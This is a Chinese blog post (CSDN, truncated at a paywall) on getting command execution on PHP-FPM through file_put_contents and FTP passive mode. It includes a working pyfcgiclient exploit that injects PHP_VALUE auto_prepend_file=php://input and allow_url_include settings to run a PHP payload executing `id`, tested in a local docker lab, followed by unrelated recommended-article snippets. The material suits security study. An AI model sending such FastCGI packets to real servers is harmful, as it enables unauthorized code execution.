file_put_contents + php-fpm 如何命令执行?

最新推荐文章于 2023-06-13 19:41:36 发布
最新推荐文章于 2023-06-13 19:41:36 发布
阅读量619 收藏 1
点赞数 1
分类专栏: 安全 文章标签: php nginx python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sdst_/article/details/118080811
版权
本文探讨了如何通过file_put_contents、FTP被动模式和php-fpm实现命令执行。首先介绍了PHP-FPM未授权访问时,通过修改auto_prepend_file或auto_append_file执行文件的原理。然后通过实验详细展示了如何在docker环境下构造数据包,利用pyfcgiclient和ftp passive mode来执行phpinfo。最后,给出了利用file_put_contents和ftp被动模式造成命令执行的步骤,并讨论了可能的其他利用方式。
摘要由CSDN通过智能技术生成

在阅读Laravel debug rce[1]的文章时,感叹文章中的技巧之余,有一句话引起了我的注意。
It is well-known that, if you can send an arbitrary binary packet to the PHP-FPM service, you can execute code on the machine.
众所周知,我不知呀!

本文学习file_put_contents + FTP + php-fpm的命令执行。

原理

参考[2],我们可以得知,PHP-FPM未授权访问时,可以通过修改变量auto_prepend_file或auto_append_file来执行文件。
根据[1]中描述,我们需要让file_put_contents时,将结果写到php-fpm,这样造成命令执行。

实验

php-fpm命令执行

docker起一个php-fpm的环境

docker pull wyveo/nginx-php-fpm
docker run -d wyveo/nginx-php-fpm

利用pyfcgiclient来发送fastcgi数据包

from pyfcgiclient.fpm import FPM

phpfpm = FPM(
    host='127.0.0.1',
    port=9000,
    sock="/run/php/php8.0-fpm.sock",
    document_root='/usr/share/nginx/html'
)

post_string = '<?php echo `id`;phpinfo(); exit();?>'

status_header, headers, output, error_message = phpfpm.load_url(
    url='/index.php?a=b',
    content=post_string,
    remote_addr='127.0.0.1',
    cookies='c=d;e=f;'
)
print(output)

由于有些参数我们没办法直接修改,就直接修改pyfcgiclient里面的文件。在pyfcgiclient的fpm.py的env中增加PHP_VALUE和PHP_ADMIN_VALUE

            'PHP_VALUE': 'auto_prepend_file = php://input',
            'PHP_ADMIN_VALUE': 'allow_url_include = On',

同时修改flup_fcgi_client.py中的_environPrefixes,增加PHP_

    _environPrefixes = ['SERVER_', 'HTTP_', 'REQUEST_', 'REMOTE_', 'PATH_',
                        'CONTENT_', 'DOCUMENT_', 'SCRIPT_','PHP_']

docker exec进入容器,下载对应文件,python执行,成功执行phpinfo。到这里,我们成功对php-fpm发包执行命令了。不过这里使用的是socket文件,不是ip+port的方式。后面我们需要修改配置。

ftp passive mode

ftp passive mode[4]

In the passive mode, the client uses the control connection to send a PASV command to the server and then receives a server IP address and server port number from the server, which the client then uses to open a data connection to the server IP address and server port number received.

我们试一下ftp passive mode。
使用pyftpdlib测试,basic_ftpd.py
我们设置passive_mode的ip和port,同时在php容器里面nc监听9000端口(为方便演示实验,缺少的bin文件都先准备好,如nc,lsof,xxd等)

    handler.masquerade_address
最低0.47元/天 解锁文章
网络安全conman
关注
专栏目录
使用PHP内置函数file_put_contents写入和追加文件内容的方法
.
09-27 1165
使用PHPfile_put_contents函数,我们可以轻松地将内容写入文件或追加内容到现有文件中。在本文中,我们将详细介绍如何使用file_put_contents函数来实现文件写入和追加内容的操作。在上面的示例中,我们将第三个参数设置为FILE_APPEND,这将告诉file_put_contents函数将内容追加到现有文件中而不是覆盖原有内容。如果你想将内容追加到现有文件中而不是覆盖原有内容,可以使用file_put_contents函数的第三个参数,将其设置为FILE_APPEND。
php-fpm进程平滑重启与process_control_timeout参数
猛犸象
07-09 1205
何为平滑重启? 当你写该了配置需要重启php-fpm才生效,如果此时php-fpm中有请求还没有处理完,暴力重启php-fpm服务会导致当前请求执行终止,轻则502,重则会产生数据异常,因为程序执行到一半被中断了,除非你对数据的处理都做了很好的安全支持。所以,我理解的平湖重启应该是每个php-fpm子进程处理完最后一个请求就自动退出。 网上说的方法 INT, TERM 立刻终止 QUIT 平滑终止 USR1 重新打开日志文件 USR2 平滑重载所有worker进程并重新载入配置和二进制模块 先找到php-
php文件放到ftp_php实现通过ftp上传文件
weixin_39924179的博客
03-08 261
大概原理遍历项目中的所有非排除文件,然后获取 文件修改时间晚于文件上一次修改时间 的文件然后将这些文件,通过ftp上传到对应的目录具体代码如下:因为只是工具,代码很乱,见谅error_reporting(7);if ($_SERVER['SERVER_ADDR'])exit;//禁止在web服务器下运行$_GET['exclude'] = array('number.txt','uploads',...
file_put_contents() 图片保存 函数成功之后返回值
weixin_33728268的博客
07-06 524
今天弄图片保存时,用到file_put_contents()来保存图片,运行了几次,发下一直没有数据出来,以为是这个函数没操作成功 于是查看了下这个函数的用法和返回值,发现我输出的返回都正确,后来才发现是其他原因引起的 现在分享下这个函数的用法: file_put_contents() 函数是一次性向文件写入字符串或追加字符串内容的最合适选择。 file_put_contents()...
两道CTF题--FTP被动模式打php-fpm
unexpectedthing的博客
02-25 1852
文章目录[陇原战疫2021网络安全大赛]eaaasyphp考点思路总结解题先看phpinfo():我们先尝试写入shellFTP的被动模式打FastCGI蓝帽杯2021 One Pointer PHP考点php数组溢出命令执行拿webshell方法1:绕过open_basedir利用未授权打FPM RCE加载恶意so文件开启FTP服务器上传文件处理伪造恶意FastCGI请求流程SUID提权总结方法2:步骤:原理: [陇原战疫2021网络安全大赛]eaaasyphp 考点 反序列化–pop链的构成 F
php 通过ftp 获取文件,怎么在php中通过ftp对文件进行上传
weixin_33794626的博客
03-28 281
怎么在php中通过ftp对文件进行上传发布时间:2020-12-24 15:23:47来源:亿速云阅读:98作者:Leah怎么在php中通过ftp对文件进行上传?针对这个问题,这篇文章详细介绍了相对应的分析和解答,希望可以帮助更多想解决这个问题的小伙伴找到更简单易行的方法。具体代码如下:...
php ftp文件传送,php实现通过ftp上传文件
weixin_35473679的博客
03-10 141
php实现通过ftp上传文件396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453454455456457...
centos下file_put_contents()无法写入文件的原因及解决方法
10-20
在使用CentOS操作系统进行PHP开发时,使用file...对于每一个潜在的问题,都有相应的解决策略,确保file_put_contents()函数可以顺利执行文件写入操作。记住,在生产环境中,始终要遵循最小权限原则,尽量减少安全风险。
----已搬运----[蓝帽杯 2021]One Pointer PHP --- PHP数组溢出,Fastcgi FTP - SSRF 攻击 php-fpm - SUID提权 proc
Zero_Adam的博客
06-11 877
二、学到的&&不足: 三、学习WP: 给了源码,两个PHP文件: user.php: <?php class User{ public $count; } ?> add_api.php <?php include "user.php"; if($user=unserialize($_COOKIE["data"])){ $count[++$user->count]=1; // 数组$count的第几个属性赋值为1 if($count[]=1){ $us
php写日志文件_PHP: file_put_contents - Manual
weixin_31423211的博客
03-09 211
I made ​​a ftp_put_contents function.hope you enjoy.}else {$fpc_file_name=$fpc_path_and_name;}//Create local temp dirif (!file_exists($cfg_temp_folder)) {if (!mkdir($cfg_temp_folder,0777)) {echo"Unabl...
关于FTP服务器出现227 Entering Passive Mode的解决方法
Niandou888的博客
05-22 6667
3.加载FileZilla Server 并保存。1.打开防火墙选择允许应用通过防火墙。2.点击允许其他应用。
nginx下ftp服务搭建
giiiig的博客
08-13 678
1、安装vsftpd组件 # yum -y install vsftpd 2、添加用户 # useradd ftpuser 3、给用户添加密码 # passwd ftpuser 4、防火墙开启21端口 因为ftp默认的端口为21,而centos默认是没有开启的,所以要修改iptables文件 [root@bogon ~]# vim /etc/sysconfig/ip
java ftp上传文件报错 (227 Entering Passive Mode (172,30,41,44,154,53))
最新发布
qq_25445369的博客
06-13 635
使用java代码实现ftp上传文件。
FTP登录服务器成功后,如果切换为被动模式,提示:227 Entering Passive Mode
lingyun1987的博客
05-25 788
然后服务器上以这个54811端口监听,FTP客户端软件就会连接这个端口,进而进行数据传输。FTP登录服务器成功后,如果切换为被动模式,返回的提示语含义?那么后面的,214,27它是如何计算的呢?端口就是214*256+27=54811。IP地址是10.199.75.133,
使用Docker封装php5.6及其扩展
kxq的博客
05-16 2081
使用Dockerhub 中的镜像地址:https://hub.docker.com/r/wyveo/nginx-php-fpm 先下载镜像及其配置文件: git clone https://github.com/wyveo/nginx-php-fpm.git 修改Dockerfile 因为项目要求php5.6,所以修改php7.2->php5.6 本次安装扩展采用的方法是pecl方法: 新添如下扩展: redis-2.2.7 imagick mongodb amqp yaf-2.3.5 yac-0.9
FTP连接时出现“227 Entering Passive Mode” 的解决方法
萌兔兔MMQ!!
07-12 3024
今天从公网的服务器连接本地内网的FTP server copy文件时,系统老是提示227 Entering Passive Mode (xxx,xxx,xxx,xxx,x),很是奇怪,于是上网找资料仔细研究了一下,原来FTP有两种工作模式,PORT模式和PASV模式. 在主动模式下,FTP客户端随机开启一个大于1024的本地端口(比如N号端口)向服务器的21号端口发起连接,然后开放N+1号端口进行监听,并向服务器发出PORT N+1命令。 服务器接收到命令后,会用其本地的FTP数据端口(通常是20)来连接客
FTP连接时出现“227 Entering Passive Mode”的解决方法
Gblfy_Blog
12-05 2541
modprobe ip_nat_ftp service vsftpd restart service vsftpd status
【内网穿透笔记】FTP映射出现227 Entering Passive Mode错误命令原因及解决方法
热门推荐
Deng's Blog
04-09 5万+
本文主要解释了被访问的FTP服务器与计算机处于同一局域网络下,出现227 Entering Passive Mode错误命令的原因,并提出了解决方法。
Error: 227 Entering Passive Mode FTP文件传输时
林海
05-04 4013
分析 FTP服务的两种工作模式: port方式(主动模式), 连接过程:客户端向服务器的FTP端口(默认是21)发送连接请求,服务器接受连接,建立一条命令链路。当需要传送数据时, 客户端在命令链路上用PORT命令告诉服务器:“我打开了***X端口,你过来连接我”。于是服务器从20端口向客户端的***X端口发送连接请求,建立一条数据链路来传送数据。 pasv方式 ( 被动模式 ), 连接过程...
Nginx+php-fpmphp内存泄漏剖析与解决方案
php-fpm的生命周期包含一系列阶段,如MINIT、RINIT、请求处理、RSHUTDOWN等,其中每个请求处理过程中,PHP会解析php文件、生成opcode并由Zend虚拟机执行。 然而,PHP作为C语言编写的,存在内存泄漏的可能性。即使...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值